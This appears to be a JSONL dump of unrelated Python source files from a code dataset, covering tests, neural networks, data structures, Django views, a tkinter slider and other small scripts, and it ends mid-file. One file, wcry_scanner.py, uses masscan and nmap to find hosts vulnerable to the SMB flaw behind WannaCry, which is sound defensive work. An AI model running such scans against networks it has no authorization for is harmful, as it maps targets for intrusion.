dude!\")\n \nlist = [1, 2, 3, 4]\nfor i in range(0, len(list)):\n print(list[i])\n\n\n","sub_path":"first.py","file_name":"first.py","file_ext":"py","file_size_in_byte":161,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"338807272","text":"import pytest\n\nfrom pyp2rpm.extract_distribution import extract_distribution\n\n\nclass TestExtractDistribution(object):\n\n @pytest.mark.parametrize(('var', 'expected'), [\n (['pkg'], ['pkg']),\n (None, []),\n ('pkg >= 2.5\\npkg2', ['pkg >= 2.5', 'pkg2']),\n (('pkg'), ['pkg']),\n (('pkg',), ['pkg']),\n ((p for p in ('pkg',)), ['pkg']),\n ])\n def test_list(self, var, expected):\n assert extract_distribution._list(var) == expected\n","sub_path":"tests/test_extract_distribution.py","file_name":"test_extract_distribution.py","file_ext":"py","file_size_in_byte":478,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"338545197","text":"import torch.nn as nn\nimport numpy as np\nfrom .base_network import NetworkBase\nimport torch\n\nclass CascadeLmkDectector(NetworkBase):\n\t\"\"\"docstring for CascadeLmkDectector\"\"\"\n\tdef __init__(self, in_channel_num=3):\n\t\tsuper(CascadeLmkDectector, self).__init__()\n\t\tself._name = 'cascade_lmk_detector'\n\n\t\tlayers = []\n\t\tlayers.append(nn.Conv2d(in_channel_num, 20, 4, 1, 0, bias=False)) # bn x in_chn x 128 x 128 -> bn x 20 x 125 x 125\n\t\tlayers.append(nn.MaxPool2d((2,2))) # bn x 20 x 125 x 125 -> bn x 20 x 62 x 62\n\t\tlayers.append(nn.Conv2d(20, 40, 3, 1, 0, bias=False)) # bn x 20 x 62 x 62 -> bn x 40 x 60 x 60\n\t\tlayers.append(nn.MaxPool2d((2,2))) # bn x 40 x 60 x 60 -> bn x 40 x 30 x 30\n\t\tlayers.append(nn.Conv2d(40, 60, 3, 1, 0, bias=False)) # bn x 40 x 30 x 30 -> bn x 60 x 28 x 28\n\t\tlayers.append(nn.MaxPool2d((2,2))) # bn x 60 x 28 x 28 -> bn x 60 x 14 x 14\n\t\tlayers.append(nn.Conv2d(60, 80, 2, 1, 0, bias=False)) # bn x 60 x 14 x 14 -> bn x 80 x 13 x 13\n\n\t\tself.conv = nn.Sequential(*layers)\n\t\tself.fc1 = nn.Linear(80*13*13, 120)\n\t\tself.fc2 = nn.Linear(120, 10) \n\n\t\t# #weight initialize\n\t\t# for m in self.modules():\n\t\t# \tif isinstance(m, nn.Conv2d):\n\t\t# \t\tm.weight.data.normal_(0, 0.02)\n\n\t\t# \telif isinstance(m, nn.ConvTranspose2d):\n\t\t# \t\tm.weight.data.normal_(0, 0.02)\n\n\t\t# \telif isinstance(m, nn.Linear):\n\t\t# \t\tm.weight.data.normal_(0, 0.02)\n\n\tdef forward(self, input):\n\t\tx = self.conv(input)\n\n\t\tx = x.view(-1, 80*13*13)\n\n\t\tx = self.fc1(x)\n\n\t\tx = x.view(-1, 120)\n\n\t\tx = self.fc2(x)\n\n\t\treturn x ","sub_path":"networks/cascade_lmk_detector.py","file_name":"cascade_lmk_detector.py","file_ext":"py","file_size_in_byte":1628,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"459587069","text":"# pylint: disable=duplicate-code\n\"\"\"\nProgramming for linguists\n\nImplementation of the data structure \"Queue\" from stack\n\"\"\"\n\nfrom stack.stack import Stack\nfrom queue_.queue_ import TooManyElementsInQueueError, TypeCapacityError, QueueIsFullError\n\n\n# pylint: disable=invalid-name\nclass Queue_:\n \"\"\"\n Queue Data Structure\n \"\"\"\n\n def __init__(self, data: Stack = Stack(), capacity: int = 0):\n if not isinstance(data, Stack):\n raise TypeError\n\n if not isinstance(capacity, int):\n raise TypeCapacityError\n\n self._q_capacity = capacity\n\n if data.size() > self._q_capacity and data.size() and self._q_capacity:\n raise TooManyElementsInQueueError\n self.data = data\n\n def put(self, element):\n \"\"\"\n Add the element ‘element’ at the end of queue_\n :param element: element to add to queue_\n \"\"\"\n if self.full():\n raise QueueIsFullError\n\n return self.data.push(element)\n\n def get(self):\n \"\"\"\n Remove and return an item from queue_\n \"\"\"\n if self.empty():\n raise IndexError\n\n tmp_stack = Stack()\n while self.data.data:\n tmp_stack.push(self.data.top())\n self.data.pop()\n top_item = tmp_stack.top()\n tmp_stack.pop()\n while tmp_stack.data:\n self.data.push(tmp_stack.top())\n tmp_stack.pop()\n\n return top_item\n\n def empty(self) -> bool:\n \"\"\"\n Return whether queue_ is empty or not\n :return: True if queue_ does not contain any elements.\n False if the queue_ contains elements\n \"\"\"\n return self.data.empty()\n\n def size(self) -> int:\n \"\"\"\n Return the number of elements in queue_\n :return: Number of elements in queue_\n \"\"\"\n return self.data.size()\n\n def top(self):\n \"\"\"\n Return the element on the top of queue_\n :return: the element that is on the top of queue_\n \"\"\"\n if self.empty():\n raise IndexError\n\n tmp_stack = Stack()\n while self.data.data:\n tmp_stack.push(self.data.top())\n self.data.pop()\n top_item = tmp_stack.top()\n while tmp_stack.data:\n self.data.push(tmp_stack.top())\n tmp_stack.pop()\n\n return top_item\n\n def capacity(self):\n \"\"\"\n Return the capacity of queue_\n :return: the number of elements which can be in queue_\n \"\"\"\n return self._q_capacity\n\n def full(self):\n \"\"\"\n Return whether queue_ is full or not\n :return: True if queue_ is full.\n False if the queue_ is not full\n \"\"\"\n if not self._q_capacity:\n return False # if capacity == 0, the queue_ is infinite\n\n if self._q_capacity and self.size() == self._q_capacity:\n return True\n\n return False\n","sub_path":"queue_/queue_from_stack.py","file_name":"queue_from_stack.py","file_ext":"py","file_size_in_byte":2961,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"70238063","text":"string = input(\"Express your thoughts verbally: \")\n\nall_vowels = \"aeiouyAEIOUY\"\nvowel_counter = 0\n\nfor ch in string:\n if ch in all_vowels:\n vowel_counter += 1\n\nprint(\"The amount of vowels used in your expressed thoughts equals: \" + str(vowel_counter))\n","sub_path":"Week2/4-Three-More-Problems/count_vowels.py","file_name":"count_vowels.py","file_ext":"py","file_size_in_byte":262,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"439555401","text":"# coding=utf-8\nfrom django.conf.urls import url,include\nfrom blogs.views import BlogList, BlogDetail, PostDetail, CreateBlog, UpdateBlog, CreatePost, UpdatePost, UpdateBlogDiv, UpdatePostDiv, \\\nLikeCountView, LikeView, CategoryView, PostLikeAjaxView, PostCommentDetail\nfrom django.contrib.auth.decorators import login_required\nfrom django.views.decorators.csrf import csrf_exempt\n\n\nurlpatterns = [\n url(r'^$', BlogList.as_view(), name=\"blog_list\"),\n url(r'^newblog/',login_required(CreateBlog.as_view()), name=\"addblog\"),\n url(r'^(?P\\d+)/edit/$', login_required(UpdateBlog.as_view()), name=\"editblog\"),\n url(r'^(?P\\d+)/$', BlogDetail.as_view(), name=\"blogDetail\"),\n url(r'^posts/(?P\\d+)/$', PostDetail.as_view(), name=\"postDetail\"),\n\nurl(r'^ckeditor/', include('ckeditor_uploader.urls'), name=\"meow\"),\n url(r'^newpost/',login_required(CreatePost.as_view()), name=\"addpost\"),\n url(r'^posts/(?P\\d+)/edit/$', login_required(UpdatePost.as_view()), name=\"editpost\"),\n url(r'^(?P\\d+)/editdiv/$', login_required(UpdateBlogDiv.as_view()), name=\"editblogdiv\"),\n url(r'^posts/(?P\\d+)/editdiv/$', login_required(UpdatePostDiv.as_view()), name=\"editpostdiv\"),\n url(r'^posts/(?P\\d+)/likes/$', csrf_exempt(PostLikeAjaxView.as_view()), name=\"likecount\"),\n url(r'posts/likes/$', LikeView.as_view(), name=\"likes\"),\n url(r'^posts/(?P\\d+)/comments/$', PostCommentDetail.as_view(), name=\"commentdiv\"),\n\n\n]\n\n\n","sub_path":"blogs/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1456,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"450694760","text":"\"\"\"trains the neural network\"\"\"\n\nfrom neural_network import *\nfrom database_creator import *\n\n\ninput = load_input_with_shuffle(r\"C:\\Users\\Antonio\\Documents\\Projet_Audi_Cup\\Reconnaissance_STOP\\panneaux_traites_entrainement\")\n# print(input.shape[0])\ninput_matrix = input[:(input.shape[0]-1),:]\nexperimental_input = input[input.shape[0]-1::input.shape[0]]\n# print(input_matrix.shape)\n# print(experimental_input)\nm = input_matrix.shape\nNN1 = Nnetwork([m[0],30,30,30,30,30,1],[sigmoid,sigmoid,sigmoid,sigmoid,sigmoid,sigmoid])\n\n\n\ndef trains_neural(input_matrix,experimental_matrix,NN):\n NN.epoch(input_matrix,experimental_matrix)\n\n\n\ntrains_neural(input_matrix,experimental_input,NN1)\n\n\ntest_images = load_input_with_shuffle(r\"C:\\Users\\Antonio\\Documents\\Projet_Audi_Cup\\Reconnaissance_STOP\\panneaux_traites_test\")\n# print(input.shape[0])\ntest_matrix = input[:(input.shape[0]-1),:]\n\ntest_output = input[input.shape[0]-1::input.shape[0]]\n\n\n\ndef test_accuracy(NN,test_images,result):\n A = NN.forward_propagation(test_images,result)[0]\n # print(A)\n score = 0\n for i in range(A.shape[1]):\n x = result[0,i]\n\n if A[0,i]>=0.5:\n y = 1\n else:\n y = 0\n if x == y:\n score+=1\n print(A[0,i])\n print(x,y)\n return score/A.shape[1]*100\n\nprint(test_accuracy(NN1,test_matrix,test_output))\n\n","sub_path":"Programmes_NN/neural_network_training.py","file_name":"neural_network_training.py","file_ext":"py","file_size_in_byte":1357,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"637535470","text":"import matplotlib.pyplot as plt\nimport random\n\nk = 10**3\n\nx = [i for i in range(k)]\ny = [1]\nz = [1.0583**i for i in x]\n\nm = 1\nfor i in range(k-1):\n temp = random.choice([1,0])\n if temp == 1:\n m *= 1.4\n else:\n m *= 0.8\n y.append(m)\n\n\nplt.yscale('log')\nplt.grid(True)\nplt.plot(x,y,'x')\nplt.plot(x,z)\nplt.show()\n","sub_path":"stockprice.py","file_name":"stockprice.py","file_ext":"py","file_size_in_byte":335,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"600955273","text":"import tensorflow as tf\nfrom tensorflow.contrib.learn.python.learn.datasets.mnist import read_data_sets\n\n\"\"\"\nPurpose: Use logistic regression to classify mnist dataset\nOptimizer: GradientDescentOptimizer\nLearning Rate: 0.003\nAchieved test accuracy: 92.6%\n\"\"\"\n\n# Get the data\nmnist = read_data_sets(\"data\", one_hot=True, validation_size=0, reshape=True)\n\n# Define placeholders for the training and test data\nX = tf.placeholder(dtype=tf.float32, shape=[None, 28*28])\ny_true = tf.placeholder(dtype=tf.float32, shape=[None, 10])\n\n# Define variables needed for weights and biases\nW = tf.Variable(tf.zeros([28*28, 10]))\nb = tf.Variable(tf.zeros([10]))\n\n# Define logit\ny_hat = tf.add(tf.matmul(X, W), b)\n\n# Define the cost function\ncost = tf.nn.softmax_cross_entropy_with_logits(logits=y_hat, labels=y_true)\n\n# Define accuracy\ncorrect_prediction = tf.equal(tf.argmax(tf.sigmoid(y_hat), axis=1),\n tf.argmax(tf.cast(y_true, dtype=tf.float32), axis=1))\nacc = tf.reduce_mean(tf.cast(correct_prediction, dtype=tf.float32))\n\n# Define optimizer\ntrain_step = tf.train.GradientDescentOptimizer(learning_rate=0.003).minimize(cost)\n\n# Define operator to initialize variables\ninit_op = tf.global_variables_initializer()\n\nwith tf.Session() as sess:\n sess.run(init_op)\n for i in range(10000):\n X_batch, y_batch = mnist.train.next_batch(100)\n sess.run(train_step,\n feed_dict={\n X: X_batch,\n y_true: y_batch\n })\n test_acc = sess.run(acc,\n feed_dict={\n X: mnist.test.images,\n y_true: mnist.test.labels\n })\n print(\"test accuracy = {0}\".format(test_acc))","sub_path":"mnist_logistic.py","file_name":"mnist_logistic.py","file_ext":"py","file_size_in_byte":1755,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"157060510","text":"import lasagne\nfrom lasagne.layers import InputLayer, DenseLayer, DropoutLayer, LSTMLayer\n\n\ndef create_network(config, BATCH_SIZE):\n input_dim = config['input_dim']\n num_labels = config['num_labels']\n input_layer = InputLayer(shape=(BATCH_SIZE, input_dim // 2, 2))\n input_var = input_layer.input_var\n hidden_layer_1 = LSTMLayer(input_layer, 100)\n hidden_layer_2 = LSTMLayer(hidden_layer_1, 50, only_return_final=True)\n output_layer = DenseLayer(hidden_layer_2,\n num_units=num_labels,\n nonlinearity=lasagne.nonlinearities.softmax)\n return locals()\n","sub_path":"trainNN/out/v036-online-lstm-dirty/network_model.py","file_name":"network_model.py","file_ext":"py","file_size_in_byte":629,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"107114063","text":"#!/usr/bin/env python\nfrom time import sleep\n\nimport rospy\n\nimport tf2_ros\nfrom tf2_geometry_msgs import do_transform_point\nfrom geometry_msgs.msg import PointStamped\n\n\nif __name__ == '__main__':\n rospy.init_node('get_odom_point', anonymous=True)\n\n tf_buffer = tf2_ros.Buffer()\n tf_listener = tf2_ros.TransformListener(tf_buffer)\n sleep(5)\n now = rospy.Time.now()\n transform = tf_buffer.lookup_transform('odom', 'base_link', now, rospy.Duration(10))\n robot = PointStamped()\n robot.header.stamp = now\n robot.header.frame_id = 'base_link'\n robot.point.x = 0\n robot.point.y = 0\n\n robot = do_transform_point(robot, transform)\n print(\"[{}, {}]\".format(robot.point.x, robot.point.y))\n","sub_path":"src/magellan_core/scripts/get_odom_point.py","file_name":"get_odom_point.py","file_ext":"py","file_size_in_byte":717,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"155257794","text":"#!/usr/bin/env python3\n\"\"\"\nUsage:\n wcry_scanner.py (--subnet=) (--outfile=)\n\nOptions:\n --subnet= Subnet to scan example: 192.168.0.0/24\n --outfile= Absolute path to output file example: /home/user/rhosts.log\n\"\"\"\nimport logging\n\nlogging.basicConfig(\n format='%(asctime)s - %(levelname)s - %(message)s', \n level=logging.DEBUG, \n handlers=[\n logging.FileHandler(filename=\"wcry_scanner.log\", mode=\"w+\"),\n logging.StreamHandler()\n ]\n )\n\nimport os\nimport docopt\nimport masscan\nimport nmap\n\nfrom datetime import datetime\n\n\ndef gather_cli_options() -> dict:\n \"\"\"\n Return a dictionary with our docopt command line options.\n\n Args:\n None\n\n Returns:\n A dictionary containing the values provided by docopt via command line arguments\n \"\"\"\n logging.info(\"Entering gather_cli_options\")\n opts = docopt.docopt(__doc__)\n subnet = opts['--subnet']\n outfile = opts['--outfile']\n logging.info(\"CLI options gathered: {}\".format(opts))\n return {\"subnet\": subnet, \"outfile\": outfile}\n\n\ndef run_masscan(subnet: str) -> list:\n \"\"\"\n Run masscan against a subnet to quickly return a list of IPs with open port 445.\n\n Args:\n subnet: A subnet to scan\n\n Returns:\n A list of IPv4 addresses that report TCP port 445 as open by masscan\n\n Note:\n Masscan command: masscan -oX - -p 445\n \"\"\"\n logging.info(\"Entering run_masscan\")\n rhosts_open_445 = []\n\n try:\n my_scanner = masscan.PortScanner()\n except masscan.PortScannerError as ex:\n logging.debug(\"MASSCAN not installed to OS path: {}\".format(str(ex)))\n os._exit(1)\n \n logging.info(\"Begin masscan against subnet: {}\".format(subnet))\n try:\n my_scanner.scan(subnet, ports='445')\n scan_results = my_scanner.scan_result['scan']\n except masscan.PortScannerError as ex:\n logging.debug(\"The masscan requires root privleges, run with sudo\")\n os._exit(1)\n except KeyError as ex:\n logging.debug(\"Masscan results do not contain scan data: {}\".format(str(ex)))\n os._exit(1)\n\n for host in my_scanner.all_hosts:\n try:\n if scan_results[host]['tcp'][445]['state'] == 'open':\n rhosts_open_445.append(host)\n except KeyError as ex:\n logging.debug(\"Port 445 closed on: {}\".format(host))\n pass\n\n logging.debug(\"Hosts with open 445: {}\".format(rhosts_open_445))\n return rhosts_open_445\n\n\ndef run_nmap(rhosts_open_445: list) -> list:\n \"\"\"\n Nmap scan against returned list of IPs from masscan.\n\n Args:\n rhosts_open_445: List of hosts with TCP port 445 open\n\n Returns:\n A list of IPv4 addresses that report TCP port 445 as vulnerable to eternalblue by nmap\n\n Note:\n Nmap command: nmap -p445 --script smb-vuln-ms17-010 \n \"\"\"\n logging.info(\"Entering run_nmap\")\n rhosts_ms17_vuln = []\n rhosts_list_str = ' '.join(rhosts_open_445)\n \n try:\n logging.info(\"Setting up nmap scanner\")\n my_scanner = nmap.PortScanner()\n except nmap.nmap.PortScannerError as ex:\n logging.debug(\"NMAP not installed to OS path: {}\".format(str(ex)))\n os._exit(1)\n \n try:\n logging.info(\"Begin nmap scan against IP list: {}\".format(rhosts_open_445))\n full_results = my_scanner.scan(hosts=rhosts_list_str, arguments='-Pn -p445 --script smb-vuln-ms17-010')\n scan_results = full_results['scan']\n except nmap.nmap.PortScannerError as ex:\n logging.debug(\"The nmap scan requires root privleges, run with sudo\")\n os._exit(1)\n except KeyError as ex:\n logging.debug(\"Results do not contain scan data: {}\".format(str(ex)))\n os._exit(1)\n\n for host in my_scanner.all_hosts():\n try:\n if 'State: VULNERABLE' in scan_results[host]['hostscript'][0]['output']:\n logging.info(\"Host vulnerable: {}\".format(host))\n rhosts_ms17_vuln.append(host)\n except:\n # Should we save not vuln to a seperate file?\n logging.info(\"Host not vulnerable: {}\".format(host))\n pass\n return rhosts_ms17_vuln\n\n\ndef results_to_file(data: list, outfile: str) -> str:\n \"\"\"\n Write the results to a file.\n\n Args:\n data: The data to write to the outfile\n outfile: The absolute path for the outfile of results\n\n Returns:\n The absolute path where the outfile is written containing all vulnerable IPs\n \"\"\"\n logging.info(\"Entering results_to_file\")\n logging.debug(\"Creating new outfile {}\".format(outfile))\n with open(outfile, \"w+\") as file:\n for ip in data:\n file.write(\"{}\\n\".format(ip))\n file.close()\n logging.info(\"Results file: {}\".format(outfile))\n return outfile\n\n\ndef main():\n \"\"\"\n Main function to run script.\n \"\"\"\n startTime = datetime.now()\n logging.info(\"Running wcry_scanner\")\n cli_options = gather_cli_options()\n rhosts_open_445 = run_masscan(cli_options['subnet'])\n rhosts_ms17_vuln = run_nmap(rhosts_open_445)\n results_to_file(rhosts_ms17_vuln, cli_options['outfile'])\n logging.info(\"Completion time: {}\".format(datetime.now() - startTime))\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"wcry_scanner.py","file_name":"wcry_scanner.py","file_ext":"py","file_size_in_byte":5323,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"523607672","text":"from sklearn import svm\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport csv\n\ndef outputfunc(input):\n\t#Random circle around -1,-1\n\trand_rad = np.random.rand()\n\treturn rand_rad*np.cos(input), rand_rad*np.sin(input)\n\ndef circ_func(run,theta):\n\tx,y = outputfunc(theta)\n\t#Random circle around 1,1\n\trun.x.append(x+1.1)\n\trun.y.append(y-1.1)\n\ndef circ_func2(run,theta):\n\tx,y = outputfunc(theta)\n\t#Random circle around 1,1\n\trun.x.append(x-1.1)\n\trun.y.append(y+1.1)\n\nclass DataRun():\n\tdef __init__(self):\n\t\tself.x = []\n\t\tself.y = []\t\t\n\ntheta = np.linspace(0,2*np.pi)\nrun1 = DataRun()\nrun2 = DataRun()\nrun3 = DataRun()\nrun4 = DataRun()\nrun5 = DataRun()\n\nrun6 = DataRun()\nrun7 = DataRun()\nrun8 = DataRun()\nrun9 = DataRun()\nrun10 = DataRun()\n\nfor i in theta:\n\tcirc_func(run1,i)\n\tcirc_func(run2,i)\n\tcirc_func(run3,i)\n\tcirc_func(run4,i)\n\tcirc_func(run5,i)\n\n\tcirc_func2(run6,i)\n\tcirc_func2(run7,i)\n\tcirc_func2(run8,i)\n\tcirc_func2(run9,i)\n\tcirc_func2(run10,i)\n\nplt.plot(run1.x,run1.y, 'ro')\nplt.plot(run2.x,run2.y, 'ro')\nplt.plot(run3.x,run3.y, 'ro')\nplt.plot(run4.x,run4.y, 'ro')\nplt.plot(run5.x,run5.y, 'ro')\n\nplt.plot(run6.x,run6.y, 'bo')\nplt.plot(run7.x,run7.y, 'bo')\nplt.plot(run8.x,run8.y, 'bo')\nplt.plot(run9.x,run9.y, 'bo')\nplt.plot(run10.x,run10.y, 'bo')\nplt.show()\n\nruns = []\nruns.append(run1)\nruns.append(run2)\nruns.append(run3)\nruns.append(run4)\nruns.append(run5)\nruns.append(run6)\nruns.append(run7)\nruns.append(run8)\nruns.append(run9)\nruns.append(run10)\n\nwith open('data_b.csv','a+',newline ='') as csvfile:\n\tcsvwriter = csv.writer(csvfile, delimiter=',', quotechar = '|', quoting=csv.QUOTE_MINIMAL)\n\tfor i in range(len(runs)):\n\t\tfor j in range(len(runs[i].x)):\n\t\t\tcsvwriter.writerow([runs[i].x[j], runs[i].y[j], 0])","sub_path":"lab10_2021/svm/make_data_1b.py","file_name":"make_data_1b.py","file_ext":"py","file_size_in_byte":1722,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"263864390","text":"from django.template import Context, loader\nfrom django.views.decorators.http import require_GET, require_http_methods\nfrom django.http import HttpResponse\nfrom django.conf import settings\nimport urllib3\n#from django.conf.urls.defaults import *\n\n@require_GET\ndef search(request):\n \"\"\"The default full text search page.\"\"\"\n template = loader.get_template('search.html')\n content = Context({})\n return HttpResponse(template.render(content))\n\n\n@require_http_methods([\"GET\", \"POST\"])\ndef proxy(request):\n \"\"\"Proxy connection to \"\"\"\n full_url = request.get_full_path()\n http = urllib3.PoolManager()\n url = settings.PROXY_BASE_URL + full_url.replace(\"/elasticsearch/\", \"\")\n content_type = {'Content-Type':request.META.get('CONTENT_TYPE')}\n response = http.request(request.method, url, headers=content_type, body=request.body)\n r_type = response.getheader('content-type')\n r_data = response.data\n r_status = response.status\n return HttpResponse(content=r_data, content_type=r_type, status=r_status)","sub_path":"onionDjangoSearch/onionsearch/onionsearch/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1033,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"56240681","text":"import tkinter as Tk\n\nclass SliderFrame(Tk.Canvas):\n #pass in: network, draw_plot, image_selection\n def __init__(self,parent,callback):\n Tk.Canvas.__init__(self,parent,bg='white')\n \n #parent.bind('',self.up)\n #parent.bind('',self.down)\n \n self.parent=parent\n self.box=None\n \n self.slider_state=False\n self.slider_position=20\n self.values={'cur':6.1,\n 'min':0.1,\n 'max':12.1,\n 'step':0.1,\n 'unit':'pF'}\n\n self.callback=callback\n \n self.snap_pixels=(self.values['max']-self.values['min'])/self.values['step']/400\n\n #print self.snap_pixels\n self.highvar = Tk.StringVar()\n self.elemvar = Tk.StringVar()\n self.lowvar = Tk.StringVar()\n \n self.canvas1 = Tk.Canvas(width=200, height=500)\n self.canvas1.configure(background='white')\n self.canvas1.grid(row=1,column=0,stick=Tk.N)#(expand=1, fill=Tk.BOTH)\n\n self.canvas1.create_line(50,50,50,450,width=4,fill='#777')\n self.slider=self.canvas1.create_line(40,250,60,250,width=10,fill='#228')\n\n self.entry_high=Tk.Entry(self.canvas1, width=6, bg=self.canvas1['bg'], textvariable=self.highvar, justify='center',state='readonly')\n self.entry_high.bind('',self.update_slider)\n \n self.canvas1.create_window(50,25,window=self.entry_high)\n self.valuetext=self.canvas1.create_text(90,250, text=self.elemvar.get())\n self.entry_low=Tk.Entry(self.canvas1, width=6, bg=self.canvas1['bg'], textvariable=self.lowvar, justify='center',state='readonly')\n self.entry_low.bind('',self.update_slider)\n \n self.canvas1.create_window(50,475,window=self.entry_low)\n\n self.canvas1.update()\n self.canvas1.tag_bind(self.slider,'',self.slideon)\n self.canvas1.bind('',self.mouse_move_slider)\n\n self.update_slider()\n \n def update_slider(self,**kargs):\n\n if 'values' in kargs:\n self.values=kargs['values']\n self.canvas1.itemconfigure(self.valuetext,text=str(\"%.2f\"%self.values['cur'])+' '+self.values['unit'])\n \n self.highvar.set(str(self.values['max'])+' '+self.values['unit'])\n self.elemvar.set(str(self.values['cur'])+' '+self.values['unit'])\n self.lowvar.set(str(self.values['min'])+' '+self.values['unit'])\n\n print (\"update_slide()\", self.values['cur'])\n \n def update_slider_position(self):\n self.move_slider_value(self.values['cur'])\n \n def slider_active(self,*args):\n if self.slider_state==False:\n self.box=self.canvas1.create_rectangle(35,45,65,455,width=1,dash='.')\n self.slider_state=True\n \n def slider_deactive(self,*args):\n #global box\n if self.slider_state==True:\n self.canvas1.delete(self.box)\n self.slider_state=False\n\n def slideon(self,event):\n self.slider_active()\n self.slide_active=True\n\n def slideoff(self,event):\n self.slider_deactive()\n self.slider_state=False\n\n\n def val_from_coord(self,y):\n Vmin=self.values['min']\n Vmax=self.values['max']\n \n m=(Vmin-Vmax)/(450.0-50.0)\n\n return m*(y-450.0)+Vmin\n\n\n def coord_from_val(self,val):\n Vmin=self.values['min']\n Vmax=self.values['max']\n \n m=(Vmin-Vmax)/(450.0-50.0)\n \n return (val-Vmin)/m+450.0\n\n \n def mouse_move_slider(self,event):\n new_x, new_y = event.x, event.y\n x1, y1, x2, y2 = self.canvas1.coords(self.slider)\n\n if ((new_y <= 450)&(new_y>=50)):\n distance=new_y-y2\n if abs(distance)>= self.snap_pixels:\n distance=int((new_y-y2)/self.snap_pixels)*self.snap_pixels\n self.canvas1.move(self.slider,0,distance)\n self.slider_position=y2+distance\n\n self.values['cur']=self.val_from_coord(self.slider_position)\n \n self.update_slider()\n\n self.callback(values={'cur':self.values['cur']})\n \n \n def move_slider_value(self,val):\n \"\"\"\n !!! FINISH THIS FUNCTION !!!\n \"\"\"\n \n x1,y1,x2,y2=self.canvas1.coords(self.slider)\n self.values['cur']=val\n self.canvas1.move(self.slider,0,self.coord_from_val(val)-y1)\n \n #self.update_slider()\n\nif __name__=='__main__':\n\n class MainWindow(Tk.Frame):\n def __init__(self,parent):\n Tk.Frame.__init__(self,parent)\n\n #SLIDER FRAME\n Slider_Frame=Tk.Frame(root)\n Slider_Frame.grid(row=0,column=0)\n \n slider_canvas=Tk.Canvas(Slider_Frame)\n slider=SliderFrame(slider_canvas,self.callback)\n\n def callback(self,**kargs):\n print(kargs)\n \n root = Tk.Tk()\n a=MainWindow(root)\n root.mainloop()\n","sub_path":"canvas_slider.py","file_name":"canvas_slider.py","file_ext":"py","file_size_in_byte":5004,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"547691161","text":"import numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport time\r\n\r\nx = np.linspace(-2,4,101)\r\nn = len(x)\r\nu0x = np.empty(n)\r\nvn = np.empty(n)\r\nvn_old = u0x\r\nj=0\r\nLambda = 0.5\r\nfor i in range(0,n):\r\n if abs(x[i]) <= 1:\r\n u0x[i] = 1 - abs(x[i])\r\n else:\r\n u0x[i] = 0\r\n\r\n\r\nwhile j <= 8:\r\n for k in range(0,n-1):\r\n vn[k] = vn_old[k] - Lambda*(vn_old[k+1] - vn_old[k])\r\n vn[0] = 0\r\n vn[n-1] = 0\r\n \r\n \r\n plt.clf()\r\n plt.plot(x,u0x,x,vn,x,vn_old)\r\n plt.show()\r\n time.sleep(1)\r\n vn_old = vn\r\n vn = np.zeros(n)\r\n j += 1","sub_path":"1_3_1.py","file_name":"1_3_1.py","file_ext":"py","file_size_in_byte":585,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"274597312","text":"import pandas as pd\nimport json\n\n\n\nJSON = False\nCSV = True\nSEP = '|' #separator for the csv file\nFORMATTED_INPUT_FILE = 'dataset/final_test_dataset_5_threshold_1500.csv'\nSENTIMENT_FILE = 'sentiment_analysis/final_test_dataset_5_threshold_1500_sentiment.json'\nOUTPUT_FILE = \"sentiment_analysis/final_test_dataset_5_threshold_1500.csv\"\nCLUSTER_FILE = \"\"\nCLUSTER = False\nELIMINATE_OUTLIERS = True\n\n\n\n\ndef average_emotion(target_tweet_analysis, target_emotion):\n\n number_keywords = len(target_tweet_analysis[\"tweet_analysis\"][\"keywords\"])\n total_emotion = 0.0\n for keyword_index in range(number_keywords):\n target_keyword = target_tweet_analysis[\"tweet_analysis\"][\"keywords\"][keyword_index]\n try:\n total_emotion += target_keyword[\"emotion\"][target_emotion]*target_keyword[\"relevance\"]\n except KeyError:\n total_emotion += 0\n\n return total_emotion\n\n\ndef average_sentiment(target_tweet_analysis):\n\n number_keywords = len(target_tweet_analysis[\"tweet_analysis\"][\"keywords\"])\n total_sentiment = 0.0\n for keyword_index in range(number_keywords):\n target_keyword = target_tweet_analysis[\"tweet_analysis\"][\"keywords\"][keyword_index]\n try:\n total_sentiment += target_keyword[\"sentiment\"][\"score\"]*target_keyword[\"relevance\"]\n except KeyError:\n total_sentiment += 0\n\n return total_sentiment\n\n#If the input file is a JSON or a csv file.\n#One of them (only one) must me True\n\nif JSON:\n with open(FORMATTED_INPUT_FILE) as json_data:\n formatted_tweets = json.load(json_data)\n\nelif CSV:\n formatted_tweets = pd.read_csv(FORMATTED_INPUT_FILE, sep=SEP)\n if CLUSTER:\n df_file = pd.read_csv(CLUSTER_FILE)\nelse:\n raise Exception(\"Both JSON and CSV are false\")\n\n\nwith open(SENTIMENT_FILE) as json_data:\n tweets_analysis = json.load(json_data)\n\ntweets_csv = open(OUTPUT_FILE, \"w\")\ntweets_csv.write(\"tweet_id,fake,joy,sadness,anger,fear,disgust,sentiment\")\n\nif CLUSTER:\n 